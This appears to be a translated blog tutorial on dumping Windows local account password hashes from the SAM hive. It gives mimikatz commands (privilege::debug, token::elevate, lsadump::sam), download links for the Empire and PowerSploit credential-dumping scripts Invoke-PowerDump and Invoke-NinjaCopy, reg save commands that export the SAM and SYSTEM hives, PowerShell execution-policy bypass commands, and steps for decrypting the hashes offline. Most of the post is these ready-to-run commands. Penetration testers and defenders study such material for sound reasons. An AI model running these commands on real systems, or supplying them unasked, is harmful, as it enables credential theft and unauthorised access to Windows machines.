SAM file acquisition and decryption

Preface

NTDS.dit (Active Directory database, present on domain controllers only): C:\Windows\NTDS\NTDS.dit
SYSTEM hive (holds the boot key that encrypts the SAM hashes): C:\Windows\System32\config\SYSTEM
SAM hive (local account database): C:\Windows\System32\config\SAM

This post covers methods of obtaining local user password hashes from the SAM database. All of them need local administrator rights: the SAM hive is readable only by SYSTEM, and the hashes inside it are encrypted with a key stored in the SYSTEM hive.


Online reading (on the running system)

mimikatz reads the SAM database on the live system. privilege::debug acquires SeDebugPrivilege and token::elevate impersonates the SYSTEM token, which is needed because the SAM hive is not readable by ordinary administrators:

privilege::debug
token::elevate
lsadump::sam


PowerShell (Invoke-PowerDump)

Use the Invoke-PowerDump script shipped with Empire; download it from:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
It must be run from an elevated PowerShell session. The output is in pwdump format, one line per account: from left to right the fields are the username, the RID, the LM hash and the NT hash, separated by colons (user:rid:lmhash:nthash:::).
A RID of 500 is the built-in Administrator account and 501 is the built-in Guest account; ordinary local users start at 1000. LM and NT hashes are computed differently: the LM hash DES-encrypts a fixed constant with the password uppercased and split into two 7-character halves (no salt, 14-character maximum), while the NT hash is the MD4 of the password encoded as UTF-16LE (no salt either). Modern Windows no longer stores LM hashes by default, so the LM field is usually the constant aad3b435b51404eeaad3b435b51404ee, and an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 means the password is empty. See the linked blog post for details.

Offline extraction and cracking

How to obtain the SYSTEM and SAM hive files

Using the registry (requires administrator permissions)

Export the SAM and SYSTEM hives of the current system and read them on another machine. Both are needed: the hashes inside SAM are encrypted with the boot key (syskey) stored in SYSTEM. Copying the files directly out of C:\Windows\System32\config fails while Windows is running, because the kernel keeps them open exclusively, so they are exported with reg save instead (administrator privileges required; add /y to overwrite an existing output file):

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv


Obtaining SAM and SYSTEM with Invoke-NinjaCopy

Invoke-NinjaCopy (PowerSploit) reads the raw NTFS volume instead of going through the file system, so it bypasses both the exclusive lock and the file's ACL. It still requires administrator rights, since opening the raw volume does.

Invoke-NinjaCopy download address: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "c:\sam.hiv"

Appendix: commands to bypass the PowerShell execution policy (it only blocks scripts from running by accident, it is not a security boundary):
cmd: powershell -ep bypass
PowerShell: Set-ExecutionPolicy Bypass -Scope Process

Other ways of bypassing the PowerShell execution policy are covered in the linked article.


Decrypting the SAM hive

Use mimikatz on any machine; the parameters are the paths of the SYSTEM and SAM hives exported above. mimikatz derives the boot key from SYSTEM, uses it to unwrap the SAM encryption key, and prints each account's RID, username and hashes:
lsadump::sam /sam:sam.hiv /system:system.hiv
Origin blog.csdn.net/qq_41874930/article/details/108149449